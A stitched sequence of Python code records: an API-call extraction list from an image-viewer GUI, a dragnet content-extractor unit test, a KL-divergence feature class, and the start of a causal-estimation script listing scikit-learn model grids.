Image"""', 'rsIm'], {}), "('Display Image', rsIm)\n", (14703, 14726), False, 'import cv2\n'), ((14736, 14750), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (14747, 14750), False, 'import cv2\n'), ((15316, 15337), 'numpy.arange', 'np.arange', (['(0)', '(100)', '(20)'], {}), '(0, 100, 20)\n', (15325, 15337), True, 'import numpy as np\n'), ((17824, 17844), 'numpy.arange', 'np.arange', (['(0)', '(70)', '(10)'], {}), '(0, 70, 10)\n', (17833, 17844), True, 'import numpy as np\n'), ((23048, 23088), 'numpy.empty', 'np.empty', (['imageHist.shape'], {'dtype': '"""float"""'}), "(imageHist.shape, dtype='float')\n", (23056, 23088), True, 'import numpy as np\n'), ((23129, 23153), 'numpy.cumsum', 'np.cumsum', (['imageHist[1:]'], {}), '(imageHist[1:])\n', (23138, 23153), True, 'import numpy as np\n'), ((23406, 23434), 'numpy.argmax', 'np.argmax', (['(cumHist >= lowcut)'], {}), '(cumHist >= lowcut)\n', (23415, 23434), True, 'import numpy as np\n'), ((23446, 23475), 'numpy.argmax', 'np.argmax', (['(cumHist >= highcut)'], {}), '(cumHist >= highcut)\n', (23455, 23475), True, 'import numpy as np\n'), ((23720, 23769), 'numpy.require', 'np.require', (['scIm'], {'dtype': '"""uint8"""', 'requirements': '"""C"""'}), "(scIm, dtype='uint8', requirements='C')\n", (23730, 23769), True, 'import numpy as np\n'), ((24215, 24254), 'numpy.zeros', 'np.zeros', (['(rc[0] + 3, 2)'], {'dtype': '"""float"""'}), "((rc[0] + 3, 2), dtype='float')\n", (24223, 24254), True, 'import numpy as np\n'), ((24733, 24765), 'PyQt5.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['QtCore.QPoint'], {}), '(QtCore.QPoint)\n', (24750, 24765), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((40266, 40288), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (40278, 40288), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((40431, 40463), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (40453, 40463), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1864, 1892), 'numpy.sum', 'np.sum', (['(rawobjectArea > 0)', '(1)'], {}), '(rawobjectArea > 0, 1)\n', (1870, 1892), True, 'import numpy as np\n'), ((3058, 3110), 'numpy.linspace', 'np.linspace', (['xLim[cnt, 0]', 'xLim[cnt, 1]'], {'num': 'numbins'}), '(xLim[cnt, 0], xLim[cnt, 1], num=numbins)\n', (3069, 3110), True, 'import numpy as np\n'), ((3133, 3201), 'fast_histogram.histogram1d', 'histogram1d', (['fitData[:, fitCol[cnt]]', '(75)', 'xLim[cnt, :]'], {'weights': 'None'}), '(fitData[:, fitCol[cnt]], 75, xLim[cnt, :], weights=None)\n', (3144, 3201), False, 'from fast_histogram import histogram1d\n'), ((4510, 4567), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xlim': 'xLim[n, :]', 'ylim': 'yLim[n, :]'}), '(axesPos[n, :], xlim=xLim[n, :], ylim=yLim[n, :])\n', (4518, 4567), True, 'import matplotlib.pyplot as plt\n'), ((4595, 4614), 'numpy.log2', 'np.log2', (['objectArea'], {}), '(objectArea)\n', (4602, 4614), True, 'import numpy as np\n'), ((5249, 5270), 'matplotlib.pyplot.savefig', 'plt.savefig', (['savePath'], {}), '(savePath)\n', (5260, 5270), True, 'import matplotlib.pyplot as plt\n'), ((5291, 5301), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5299, 5301), True, 'import matplotlib.pyplot as plt\n'), ((7775, 7814), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (7783, 7814), True, 'import numpy as np\n'), ((7835, 7874), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (7843, 7874), True, 'import numpy as np\n'), ((7895, 7934), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (7903, 7934), True, 'import numpy as np\n'), ((9364, 9467), 'matplotlib.patches.PathPatch', 'mpatches.PathPatch', (['pathDict[roi][textLbls[n]]'], {'facecolor': '[0, 0, 1, 1]', 'edgecolor': 'None', 'linewidth': '(0)'}), '(pathDict[roi][textLbls[n]], facecolor=[0, 0, 1, 1],\n edgecolor=None, linewidth=0)\n', (9382, 9467), True, 'import matplotlib.patches as mpatches\n'), ((10338, 10444), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xscale': '"""log"""', 'xlim': '[1, 10000]', 'ylim': '[0, numRoi + 1]', 'yticks': '[]', 'xticks': 'xTicks'}), "(axesPos[n, :], xscale='log', xlim=[1, 10000], ylim=[0, numRoi + 1],\n yticks=[], xticks=xTicks)\n", (10346, 10444), True, 'import matplotlib.pyplot as plt\n'), ((12590, 12624), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""Display Image"""'], {}), "('Display Image')\n", (12607, 12624), False, 'import cv2\n'), ((14791, 14825), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""Display Image"""'], {}), "('Display Image')\n", (14808, 14825), False, 'import cv2\n'), ((24926, 24956), 'PyQt5.QtWidgets.QGraphicsScene', 'QtWidgets.QGraphicsScene', (['self'], {}), '(self)\n', (24950, 24956), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((24980, 25011), 'PyQt5.QtWidgets.QGraphicsPixmapItem', 'QtWidgets.QGraphicsPixmapItem', ([], {}), '()\n', (25009, 25011), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((25035, 25043), 'PyQt5.QtGui.QImage', 'QImage', ([], {}), '()\n', (25041, 25043), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((28043, 28059), 'tools.fileio.loadConfig', 'fio.loadConfig', ([], {}), '()\n', (28057, 28059), True, 'import tools.fileio as fio\n'), ((28456, 28481), 'PyQt5.QtWidgets.QComboBox', 'QtWidgets.QComboBox', (['self'], {}), '(self)\n', (28475, 28481), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((28725, 28752), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (28746, 28752), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((28986, 29013), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (29007, 29013), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29247, 29274), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (29268, 29274), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29527, 29554), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (29548, 29554), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29698, 29723), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self'], {}), '(self)\n', (29717, 29723), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29900, 29922), 'PyQt5.QtWidgets.QSlider', 'QSlider', (['Qt.Horizontal'], {}), '(Qt.Horizontal)\n', (29907, 29922), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((30098, 30125), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self'], {}), '(self)\n', (30119, 30125), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((30235, 30258), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', ([], {}), '()\n', (30256, 30258), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((31046, 31083), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (31063, 31083), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((31223, 31244), 'PyQt5.QtWidgets.QFileDialog.Options', 'QFileDialog.Options', ([], {}), '()\n', (31242, 31244), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((33089, 33110), 'PyQt5.QtWidgets.QFileDialog.Options', 'QFileDialog.Options', ([], {}), '()\n', (33108, 33110), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((33134, 33284), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['None', '"""Select ODELAY Data Set"""', '""""""', '"""ODELAYExpDisc (*Index_ODELAYData.mat);; Mat-Files (*.mat)"""'], {'options': 'options'}), "(None, 'Select ODELAY Data Set', '',\n 'ODELAYExpDisc (*Index_ODELAYData.mat);; Mat-Files (*.mat)', options=\n options)\n", (33161, 33284), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((33359, 33407), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalImageDir']"], {}), "(self.odelayConfig['LocalImageDir'])\n", (33371, 33407), False, 'import pathlib\n'), ((33429, 33476), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalDataDir']"], {}), "(self.odelayConfig['LocalDataDir'])\n", (33441, 33476), False, 'import pathlib\n'), ((33863, 33911), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalImageDir']"], {}), "(self.odelayConfig['LocalImageDir'])\n", (33875, 33911), False, 'import pathlib\n'), ((33933, 33980), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalDataDir']"], {}), "(self.odelayConfig['LocalDataDir'])\n", (33945, 33980), False, 'import pathlib\n'), ((34105, 34132), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl)"], {}), "('./' + roiLbl)\n", (34117, 34132), False, 'import pathlib\n'), ((34157, 34216), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')"], {}), "('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')\n", (34169, 34216), False, 'import pathlib\n'), ((34491, 34512), 'tools.fileio.loadData', 'fio.loadData', (['roiPath'], {}), '(roiPath)\n', (34503, 34512), True, 'import tools.fileio as fio\n'), ((34909, 34996), 'tools.imagepl.assembleImage', 'opl.assembleImage', (['imageFilePath', 'pixSize', 'magnification', 'background', 'stitchCorners'], {}), '(imageFilePath, pixSize, magnification, background,\n stitchCorners)\n', (34926, 34996), True, 'import tools.imagepl as opl\n'), ((35291, 35331), 'numpy.zeros', 'np.zeros', (['imageHist.shape'], {'dtype': '"""float"""'}), "(imageHist.shape, dtype='float')\n", (35299, 35331), True, 'import numpy as np\n'), ((35355, 35379), 'numpy.cumsum', 'np.cumsum', (['imageHist[1:]'], {}), '(imageHist[1:])\n', (35364, 35379), True, 'import numpy as np\n'), ((35581, 35609), 'numpy.argmax', 'np.argmax', (['(cumProb >= lowcut)'], {}), '(cumProb >= lowcut)\n', (35590, 35609), True, 'import numpy as np\n'), ((35625, 35654), 'numpy.argmax', 'np.argmax', (['(cumProb >= highcut)'], {}), '(cumProb >= highcut)\n', (35634, 35654), True, 'import numpy as np\n'), ((35783, 35800), 'numpy.iinfo', 'np.iinfo', (['"""uint8"""'], {}), "('uint8')\n", (35791, 35800), True, 'import numpy as np\n'), ((35817, 35848), 'numpy.clip', 'np.clip', (['scIm', 'lim.min', 'lim.max'], {}), '(scIm, lim.min, lim.max)\n', (35824, 35848), True, 'import numpy as np\n'), ((35952, 36001), 'numpy.require', 'np.require', (['scIm'], {'dtype': '"""uint8"""', 'requirements': '"""C"""'}), "(scIm, dtype='uint8', requirements='C')\n", (35962, 36001), True, 'import numpy as np\n'), ((36084, 36197), 'PyQt5.QtGui.QImage', 'QImage', (['imageData.data', 'imageData.shape[1]', 'imageData.shape[0]', 'imageData.shape[1]', 'QImage.Format_Grayscale8'], {}), '(imageData.data, imageData.shape[1], imageData.shape[0], imageData.\n shape[1], QImage.Format_Grayscale8)\n', (36090, 36197), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((36644, 36657), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (36655, 36657), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((36867, 36889), 'PyQt5.QtWidgets.QSlider', 'QSlider', (['Qt.Horizontal'], {}), '(Qt.Horizontal)\n', (36874, 36889), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((37033, 37041), 'PyQt5.QtWidgets.QLabel', 'QLabel', ([], {}), '()\n', (37039, 37041), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((37946, 37959), 'PyQt5.QtWidgets.QWidget', 'QWidget', (['self'], {}), '(self)\n', (37953, 37959), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((38072, 38085), 'PyQt5.QtWidgets.QHBoxLayout', 'QHBoxLayout', ([], {}), '()\n', (38083, 38085), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((38264, 38277), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (38275, 38277), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((38865, 38881), 'tools.fileio.loadConfig', 'fio.loadConfig', ([], {}), '()\n', (38879, 38881), True, 'import tools.fileio as fio\n'), ((38905, 38982), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""Open Movie"""', "odelayConfig['LocalDataDir']"], {}), "(self, 'Open Movie', odelayConfig['LocalDataDir'])\n", (38932, 38982), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((40827, 40859), 'numpy.abs', 'np.abs', (['((wl - 440) / (440 - 380))'], {}), '((wl - 440) / (440 - 380))\n', (40833, 40859), True, 'import numpy as np\n'), ((4932, 4989), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xlim': 'xLim[n, :]', 'ylim': 'yLim[n, :]'}), '(axesPos[n, :], xlim=xLim[n, :], ylim=yLim[n, :])\n', (4940, 4989), True, 'import matplotlib.pyplot as plt\n'), ((8103, 8151), 'numpy.linspace', 'np.linspace', (['xLim[n, 0]', 'xLim[n, 1]'], {'num': 'numbins'}), '(xLim[n, 0], xLim[n, 1], num=numbins)\n', (8114, 8151), True, 'import numpy as np\n'), ((8176, 8262), 'fast_histogram.histogram1d', 'histogram1d', (['(fitData[:, fitCol[n]] / devisor[n])', 'numbins', 'xLim[n, :]'], {'weights': 'None'}), '(fitData[:, fitCol[n]] / devisor[n], numbins, xLim[n, :],\n weights=None)\n', (8187, 8262), False, 'from fast_histogram import histogram1d\n'), ((8456, 8480), 'matplotlib.path.Path', 'mpath.Path', (['verts', 'codes'], {}), '(verts, codes)\n', (8466, 8480), True, 'import matplotlib.path as mpath\n'), ((9658, 9750), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xlim': 'xLim[n, :]', 'ylim': '[0, numRoi + 1]', 'yticks': '[]', 'xticks': 'xTicks'}), '(axesPos[n, :], xlim=xLim[n, :], ylim=[0, numRoi + 1], yticks=[],\n xticks=xTicks)\n', (9666, 9750), True, 'import matplotlib.pyplot as plt\n'), ((9962, 10065), 'matplotlib.patches.PathPatch', 'mpatches.PathPatch', (['pathDict[roi][textLbls[n]]'], {'facecolor': '[0, 0, 1, 1]', 'edgecolor': 'None', 'linewidth': '(0)'}), '(pathDict[roi][textLbls[n]], facecolor=[0, 0, 1, 1],\n edgecolor=None, linewidth=0)\n', (9980, 10065), True, 'import matplotlib.patches as mpatches\n'), ((23486, 23511), 'numpy.clip', 'np.clip', (['im', 'loval', 'hival'], {}), '(im, loval, hival)\n', (23493, 23511), True, 'import numpy as np\n'), ((33656, 33682), 'tools.fileio.loadData', 'fio.loadData', (['expIndexPath'], {}), '(expIndexPath)\n', (33668, 33682), True, 'import tools.fileio as fio\n'), ((37203, 37220), 'PyQt5.QtGui.QIcon', 'QIcon', (['"""open.png"""'], {}), "('open.png')\n", (37208, 37220), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((37449, 37466), 'PyQt5.QtGui.QIcon', 'QIcon', (['"""exit.png"""'], {}), "('exit.png')\n", (37454, 37466), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((40944, 40976), 'numpy.abs', 'np.abs', (['((wl - 440) / (490 - 440))'], {}), '((wl - 440) / (490 - 440))\n', (40950, 40976), True, 'import numpy as np\n'), ((41584, 41607), 'numpy.round', 'np.round', (['(SSS * R * 255)'], {}), '(SSS * R * 255)\n', (41592, 41607), True, 'import numpy as np\n'), ((41629, 41652), 'numpy.round', 'np.round', (['(SSS * G * 255)'], {}), '(SSS * G * 255)\n', (41637, 41652), True, 'import numpy as np\n'), ((41674, 41697), 'numpy.round', 'np.round', (['(SSS * B * 255)'], {}), '(SSS * B * 255)\n', (41682, 41697), True, 'import numpy as np\n'), ((3245, 3270), 'numpy.max', 'np.max', (['virts[cnt, 2:-10]'], {}), '(virts[cnt, 2:-10])\n', (3251, 3270), True, 'import numpy as np\n'), ((25468, 25492), 'PyQt5.QtGui.QColor', 'QtGui.QColor', (['(30)', '(30)', '(30)'], {}), '(30, 30, 30)\n', (25480, 25492), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((26685, 26700), 'PyQt5.QtGui.QPixmap', 'QtGui.QPixmap', ([], {}), '()\n', (26698, 26700), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((31910, 31947), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (31927, 31947), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((41061, 41093), 'numpy.abs', 'np.abs', (['((wl - 510) / (510 - 490))'], {}), '((wl - 510) / (510 - 490))\n', (41067, 41093), True, 'import numpy as np\n'), ((5084, 5103), 'numpy.diff', 'np.diff', (['xLim[n, :]'], {}), '(xLim[n, :])\n', (5091, 5103), True, 'import numpy as np\n'), ((8300, 8323), 'numpy.max', 'np.max', (['virts[n, 2:-10]'], {}), '(virts[n, 2:-10])\n', (8306, 8323), True, 'import numpy as np\n'), ((25860, 25885), 'PyQt5.QtCore.QRectF', 'QtCore.QRectF', (['(0)', '(0)', '(1)', '(1)'], {}), '(0, 0, 1, 1)\n', (25873, 25885), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((32350, 32387), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (32367, 32387), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((32708, 32745), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (32725, 32745), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((39113, 39141), 'PyQt5.QtCore.QUrl.fromLocalFile', 'QUrl.fromLocalFile', (['fileName'], {}), '(fileName)\n', (39131, 39141), False, 'from PyQt5.QtCore import QDir, Qt, QUrl\n'), ((41133, 41165), 'numpy.abs', 'np.abs', (['((wl - 510) / (580 - 510))'], {}), '((wl - 510) / (580 - 510))\n', (41139, 41165), True, 'import numpy as np\n'), ((41252, 41284), 'numpy.abs', 'np.abs', (['((wl - 645) / (645 - 580))'], {}), '((wl - 645) / (645 - 580))\n', (41258, 41284), True, 'import numpy as np\n')]
|
import io
import os
import unittest
import numpy as np
from sklearn.linear_model import LogisticRegression
from dragnet import Extractor
from dragnet.blocks import TagCountNoCSSReadabilityBlockifier
from dragnet.util import get_and_union_features
from dragnet.compat import str_cast
with io.open(os.path.join('test', 'datafiles', 'models_testing.html'), 'r') as f:
big_html_doc = f.read()
class TestExtractor(unittest.TestCase):
def test_extractor(self):
prob_threshold = 0.5
blockifier = TagCountNoCSSReadabilityBlockifier()
features = get_and_union_features(['weninger', 'kohlschuetter', 'readability'])
# initialize model from pre-fit attributes
model_attrs = {
'C': 1.0,
'class_weight': None,
'classes_': [0, 1],
'coef_': [[0.00501458328421719, -0.0006331822163374379, -0.6699789320373452, 0.026069227973339763, -1.5552477377277252, 0.02980432745983307, -0.965575689884716, 0.019509367890934326, -0.35692924115362307]],
'dual': False,
'fit_intercept': True,
'intercept_': [-1.2071425754440765],
'intercept_scaling': 1,
'max_iter': 100,
'multi_class': 'ovr',
'n_iter_': [12],
'n_jobs': 1,
'penalty': 'l2',
'solver': 'liblinear',
'tol': 0.0001,
'warm_start': False}
model = LogisticRegression()
for k, v in model_attrs.items():
if isinstance(v, list):
setattr(model, k, np.array(v))
else:
setattr(model, k, v)
# extract content via the extractor class
extractor = Extractor(blockifier, features=features, model=model,
to_extract='content', prob_threshold=prob_threshold)
extractor_content = extractor.extract(big_html_doc)
# extract content via individual components
blocks = blockifier.blockify(big_html_doc)
features_mat = features.transform(blocks)
positive_idx = list(model.classes_).index(1)
preds = (model.predict_proba(features_mat) > prob_threshold)[:, positive_idx].astype(int)
components_content = '\n'.join(str_cast(blocks[ind].text) for ind in np.flatnonzero(preds))
self.assertIsNotNone(extractor_content)
self.assertEqual(extractor_content, components_content)
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"dragnet.Extractor",
"numpy.flatnonzero",
"dragnet.util.get_and_union_features",
"sklearn.linear_model.LogisticRegression",
"dragnet.compat.str_cast",
"numpy.array",
"dragnet.blocks.TagCountNoCSSReadabilityBlockifier",
"os.path.join"
] |
[((2451, 2466), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2464, 2466), False, 'import unittest\n'), ((300, 356), 'os.path.join', 'os.path.join', (['"""test"""', '"""datafiles"""', '"""models_testing.html"""'], {}), "('test', 'datafiles', 'models_testing.html')\n", (312, 356), False, 'import os\n'), ((521, 557), 'dragnet.blocks.TagCountNoCSSReadabilityBlockifier', 'TagCountNoCSSReadabilityBlockifier', ([], {}), '()\n', (555, 557), False, 'from dragnet.blocks import TagCountNoCSSReadabilityBlockifier\n'), ((577, 645), 'dragnet.util.get_and_union_features', 'get_and_union_features', (["['weninger', 'kohlschuetter', 'readability']"], {}), "(['weninger', 'kohlschuetter', 'readability'])\n", (599, 645), False, 'from dragnet.util import get_and_union_features\n'), ((1432, 1452), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (1450, 1452), False, 'from sklearn.linear_model import LogisticRegression\n'), ((1703, 1813), 'dragnet.Extractor', 'Extractor', (['blockifier'], {'features': 'features', 'model': 'model', 'to_extract': '"""content"""', 'prob_threshold': 'prob_threshold'}), "(blockifier, features=features, model=model, to_extract='content',\n prob_threshold=prob_threshold)\n", (1712, 1813), False, 'from dragnet import Extractor\n'), ((2244, 2270), 'dragnet.compat.str_cast', 'str_cast', (['blocks[ind].text'], {}), '(blocks[ind].text)\n', (2252, 2270), False, 'from dragnet.compat import str_cast\n'), ((1564, 1575), 'numpy.array', 'np.array', (['v'], {}), '(v)\n', (1572, 1575), True, 'import numpy as np\n'), ((2282, 2303), 'numpy.flatnonzero', 'np.flatnonzero', (['preds'], {}), '(preds)\n', (2296, 2303), True, 'import numpy as np\n')]
|
"""Copyright © 2020-present, Swisscom (Schweiz) AG.
All rights reserved."""
from .feature import Feature
from scipy.stats import entropy
import numpy as np
class KLDivergence(Feature):
r"""
A feature that computes the KL divergence between the
logits of each data points given by a classifier mean logits
for each label and the mean of these logits for each label
----------
mean_logits : array-like of shape (n_classes, n_classes) is the mean of the logits of datapoints
having the same label. First dimension should be labels, second should be the mean logit for
this label
Attributes
----------
mean_logits: ' '
"""
def __init__(self, mean_logits):
self.mean_logits = mean_logits
def augment(self, logits):
"""
Performs the data augmentation.
Computes the KL divergence between the parameter logits and
the attribute mean_logits
:param
logits: array-like of shape (n_classes, n_samples)
:return:
C : array-like of shape (n_classes, n_samples)
"""
return np.array([entropy(logits,
np.repeat(mean_logit[..., np.newaxis], logits.shape[1], axis=1), base=2)
for mean_logit in self.mean_logits])
|
[
"numpy.repeat"
] |
[((1168, 1231), 'numpy.repeat', 'np.repeat', (['mean_logit[..., np.newaxis]', 'logits.shape[1]'], {'axis': '(1)'}), '(mean_logit[..., np.newaxis], logits.shape[1], axis=1)\n', (1177, 1231), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import time
from pathlib import Path
from experiments.evaluation import calculate_metrics
from causal_estimators.ipw_estimator import IPWEstimator
from causal_estimators.standardization_estimator import \
StandardizationEstimator, StratifiedStandardizationEstimator
from experiments.evaluation import run_model_cv
from loading import load_from_folder
from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier
from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC
from sklearn.kernel_ridge import KernelRidge
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from sklearn.gaussian_process import GaussianProcessClassifier, GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor, AdaBoostRegressor, GradientBoostingRegressor,\
RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.preprocessing import StandardScaler, PolynomialFeatures
from sklearn.exceptions import UndefinedMetricWarning
import warnings
warnings.simplefilter(action='ignore', category=UndefinedMetricWarning)
# warnings.filterwarnings("ignore", message="UndefinedMetricWarning: Precision is ill-defined and being set to 0.0 due to no predicted samples. Use `zero_division` parameter to control this behavior.")
RESULTS_DIR = Path('results')
alphas = {'alpha': np.logspace(-4, 5, 10)}
# gammas = [] + ['scale']
Cs = np.logspace(-4, 5, 10)
d_Cs = {'C': Cs}
SVM = 'svm'
d_Cs_pipeline = {SVM + '__C': Cs}
max_depths = list(range(2, 10 + 1)) + [None]
d_max_depths = {'max_depth': max_depths}
d_max_depths_base = {'base_estimator__max_depth': max_depths}
Ks = {'n_neighbors': [1, 2, 3, 5, 10, 15, 25, 50, 100, 200]}
OUTCOME_MODEL_GRID = [
('LinearRegression', LinearRegression(), {}),
('LinearRegression_interact',
make_pipeline(PolynomialFeatures(degree=2, interaction_only=True),
LinearRegression()),
{}),
('LinearRegression_degree2',
make_pipeline(PolynomialFeatures(degree=2), LinearRegression()), {}),
# ('LinearRegression_degree3',
# make_pipeline(PolynomialFeatures(degree=3), LinearRegression()), {}),
('Ridge', Ridge(), alphas),
('Lasso', Lasso(), alphas),
('ElasticNet', ElasticNet(), alphas),
('KernelRidge', KernelRidge(), alphas),
('SVM_rbf', SVR(kernel='rbf'), d_Cs),
('SVM_sigmoid', SVR(kernel='sigmoid'), d_Cs),
('LinearSVM', LinearSVR(), d_Cs),
# (SVR(kernel='linear'), d_Cs), # doesn't seem to work (runs forever)
# TODO: add tuning of SVM gamma, rather than using the default "scale" setting
# SVMs are sensitive to input scale
('Standardized_SVM_rbf', Pipeline([('standard', StandardScaler()), (SVM, SVR(kernel='rbf'))]),
d_Cs_pipeline),
('Standardized_SVM_sigmoid', Pipeline([('standard', StandardScaler()), (SVM, SVR(kernel='sigmoid'))]),
d_Cs_pipeline),
('Standardized_LinearSVM', Pipeline([('standard', StandardScaler()), (SVM, LinearSVR())]),
d_Cs_pipeline),
('kNN', KNeighborsRegressor(), Ks),
# GaussianProcessRegressor(),
# TODO: also cross-validate over min_samples_split and min_samples_leaf
('DecisionTree', DecisionTreeRegressor(), d_max_depths),
# ('RandomForest', RandomForestRegressor(), d_max_depths),
# TODO: also cross-validate over learning_rate
# ('AdaBoost', AdaBoostRegressor(base_estimator=DecisionTreeRegressor(max_depth=None)), d_max_depths_base),
# ('GradientBoosting', GradientBoostingRegressor(), d_max_depths),
# MLPRegressor(max_iter=1000),
# MLPRegressor(alpha=1, max_iter=1000),
]
PROP_SCORE_MODEL_GRID = [
('LogisticRegression_l2', LogisticRegression(penalty='l2'), d_Cs),
('LogisticRegression', LogisticRegression(penalty='none'), {}),
('LogisticRegression_l2_liblinear', LogisticRegression(penalty='l2', solver='liblinear'), d_Cs),
('LogisticRegression_l1_liblinear', LogisticRegression(penalty='l1', solver='liblinear'), d_Cs),
('LogisticRegression_l1_saga', LogisticRegression(penalty='l1', solver='saga'), d_Cs),
('LDA', LinearDiscriminantAnalysis(), {}),
('LDA_shrinkage', LinearDiscriminantAnalysis(solver='lsqr', shrinkage='auto'), {}),
